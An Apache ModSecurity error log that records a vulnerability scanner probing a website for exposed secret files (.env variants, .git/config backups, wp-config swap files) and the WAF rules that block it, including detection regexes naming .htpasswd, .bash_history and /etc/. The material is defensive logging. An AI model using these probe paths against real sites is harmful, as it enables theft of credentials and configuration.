[Tue May 26 13:04:07.973097 2026] [security2:error] [pid 470766:tid 471000] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4DqQAAAGg"]
[Tue May 26 13:04:07.976385 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D3gAAAGY"]
[Tue May 26 13:04:07.980368 2026] [security2:error] [pid 470766:tid 470965] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D3wAAAEU"]
[Tue May 26 13:04:07.991534 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D4gAAAC8"]
[Tue May 26 13:04:08.004264 2026] [security2:error] [pid 470766:tid 470985] [client 195.178.110.199:43316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/.env.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4D6QAAAFk"]
[Tue May 26 13:04:08.028442 2026] [security2:error] [pid 470766:tid 470940] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM7-jO_W1DqEcFHQ4D6AAAACw"]
[Tue May 26 13:04:08.036468 2026] [security2:error] [pid 470766:tid 470945] [client 195.178.110.199:43422] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.swp"] [unique_id "ahVM8OjO_W1DqEcFHQ4D7AAAADE"]
[Tue May 26 13:04:08.130302 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4D8QAAAHc"]
[Tue May 26 13:04:08.131856 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4D8wAAABQ"]
[Tue May 26 13:04:08.144861 2026] [security2:error] [pid 470766:tid 470988] [client 195.178.110.199:43268] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config.old"] [unique_id "ahVM8OjO_W1DqEcFHQ4D9wAAAFw"]
[Tue May 26 13:04:08.183022 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:43348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env~"] [unique_id "ahVM8OjO_W1DqEcFHQ4D_wAAAGM"]
[Tue May 26 13:04:08.221978 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EAgAAAH8"]
[Tue May 26 13:04:08.312074 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EBQAAAAE"]
[Tue May 26 13:04:08.367114 2026] [security2:error] [pid 470766:tid 470974] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4ECwAAAE4"]
[Tue May 26 13:04:08.372579 2026] [security2:error] [pid 470766:tid 470975] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4ECgAAAE8"]
[Tue May 26 13:04:08.402567 2026] [security2:error] [pid 470766:tid 470934] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EEAAAACY"]
[Tue May 26 13:04:08.404573 2026] [security2:error] [pid 470766:tid 470928] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EFAAAACA"]
[Tue May 26 13:04:08.417322 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EGQAAABA"]
[Tue May 26 13:04:08.726669 2026] [security2:error] [pid 470766:tid 470899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4EJgAAAAM"]
[Tue May 26 13:04:08.802866 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:43300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(wp-)?config\\\\.(php\\\\.)?(?:bac?k|o(?:ld|rig)|copy|s(?:ave|wp)|vim?\\\\.|~)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1254"] [id "390597"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup config file (disable this rule if you require access to these backup files)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config.bak"] [unique_id "ahVM8OjO_W1DqEcFHQ4EMAAAAG8"]
[Tue May 26 13:04:08.909370 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8OjO_W1DqEcFHQ4ENgAAAD4"]
[Tue May 26 13:04:08.943105 2026] [security2:error] [pid 470766:tid 470931] [client 195.178.110.199:43358] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.git/config~"] [unique_id "ahVM8OjO_W1DqEcFHQ4EPQAAACM"]
[Tue May 26 13:04:09.059503 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EQAAAADA"]
[Tue May 26 13:04:09.107234 2026] [security2:error] [pid 470766:tid 470932] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EQwAAACQ"]
[Tue May 26 13:04:09.757388 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EZAAAAAw"]
[Tue May 26 13:04:09.768653 2026] [security2:error] [pid 470766:tid 470899] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EZwAAAAM"]
[Tue May 26 13:04:09.811472 2026] [security2:error] [pid 470766:tid 470970] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EawAAAEo"]
[Tue May 26 13:04:09.844826 2026] [security2:error] [pid 470766:tid 471016] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EcgAAAHg"]
[Tue May 26 13:04:09.900302 2026] [security2:error] [pid 470766:tid 470938] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EfAAAACo"]
[Tue May 26 13:04:09.904120 2026] [security2:error] [pid 470766:tid 470930] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EfQAAACI"]
[Tue May 26 13:04:09.931812 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EggAAAAY"]
[Tue May 26 13:04:10.009004 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ejO_W1DqEcFHQ4EhQAAAEc"]
[Tue May 26 13:04:10.231227 2026] [security2:error] [pid 470766:tid 471017] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EiwAAAHk"]
[Tue May 26 13:04:10.236350 2026] [security2:error] [pid 470766:tid 470919] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EjgAAABc"]
[Tue May 26 13:04:10.246299 2026] [security2:error] [pid 470766:tid 471003] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EkQAAAGs"]
[Tue May 26 13:04:10.248304 2026] [security2:error] [pid 470766:tid 470926] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4ElAAAAB4"]
[Tue May 26 13:04:10.279714 2026] [security2:error] [pid 470766:tid 470924] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EmgAAABw"]
[Tue May 26 13:04:10.298915 2026] [security2:error] [pid 470766:tid 470966] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EogAAAEY"]
[Tue May 26 13:04:10.302572 2026] [security2:error] [pid 470766:tid 470994] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EowAAAGI"]
[Tue May 26 13:04:10.311067 2026] [security2:error] [pid 470766:tid 470935] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EpgAAACc"]
[Tue May 26 13:04:10.342257 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4ErAAAAD4"]
[Tue May 26 13:04:10.436537 2026] [security2:error] [pid 470766:tid 470998] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EtAAAAGY"]
[Tue May 26 13:04:10.480879 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EvQAAADA"]
[Tue May 26 13:04:10.483297 2026] [security2:error] [pid 470766:tid 470986] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EvwAAAFo"]
[Tue May 26 13:04:10.529192 2026] [security2:error] [pid 470766:tid 470967] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EwwAAAEc"]
[Tue May 26 13:04:10.537972 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4ExwAAAC8"]
[Tue May 26 13:04:10.585237 2026] [security2:error] [pid 470766:tid 470945] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EywAAADE"]
[Tue May 26 13:04:10.642849 2026] [security2:error] [pid 470766:tid 470950] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E0wAAADY"]
[Tue May 26 13:04:10.642895 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E1QAAAG0"]
[Tue May 26 13:04:10.683107 2026] [security2:error] [pid 470766:tid 471021] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E2gAAAH0"]
[Tue May 26 13:04:10.692548 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E3QAAAGQ"]
[Tue May 26 13:04:10.701262 2026] [security2:error] [pid 470766:tid 470964] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E4AAAAEQ"]
[Tue May 26 13:04:10.739870 2026] [security2:error] [pid 470766:tid 470989] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E5QAAAF0"]
[Tue May 26 13:04:10.746797 2026] [security2:error] [pid 470766:tid 470936] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E5gAAACg"]
[Tue May 26 13:04:10.762161 2026] [security2:error] [pid 470766:tid 470951] [client 195.178.110.199:43358] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E6QAAADc"]
[Tue May 26 13:04:10.766848 2026] [security2:error] [pid 470766:tid 470961] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E6gAAAEE"]
[Tue May 26 13:04:10.769602 2026] [security2:error] [pid 470766:tid 470924] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E7QAAABw"]
[Tue May 26 13:04:10.810871 2026] [security2:error] [pid 470766:tid 470910] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E8wAAAA4"]
[Tue May 26 13:04:10.828881 2026] [autoindex:error] [pid 470766:tid 470921] [client 195.178.110.199:0] AH01276: Cannot serve directory /home1/vcress4h/public_html/.well-known/acme-challenge/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:04:10.873808 2026] [security2:error] [pid 470766:tid 470916] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4E_wAAABQ"]
[Tue May 26 13:04:10.940781 2026] [security2:error] [pid 470766:tid 470902] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4FAgAAAAY"]
[Tue May 26 13:04:11.015061 2026] [security2:error] [pid 470766:tid 471023] [client 195.178.110.199:43332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/ADMIN/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FBgAAAH8"]
[Tue May 26 13:04:11.046004 2026] [security2:error] [pid 470766:tid 470906] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM8ujO_W1DqEcFHQ4EzgAAAAo"]
[Tue May 26 13:04:11.191777 2026] [security2:error] [pid 470766:tid 470983] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FDgAAAFc"]
[Tue May 26 13:04:11.206661 2026] [security2:error] [pid 470766:tid 470962] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FEgAAAEI"]
[Tue May 26 13:04:11.261205 2026] [security2:error] [pid 470766:tid 471009] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM8-jO_W1DqEcFHQ4FFQAAAHE"]
[Tue May 26 13:04:11.267951 2026] [security2:error] [pid 470766:tid 471014] [client 195.178.110.199:43312] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/.wp-config.php.swp"] [unique_id "ahVM8-jO_W1DqEcFHQ4FFgAAAHY"]
[Tue May 26 13:04:11.355983 2026] [security2:error] [pid 470766:tid 470953] [client 195.178.110.199:43290] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/APP/.env"] [unique_id "ahVM8-jO_W1DqEcFHQ4FJwAAADk"]
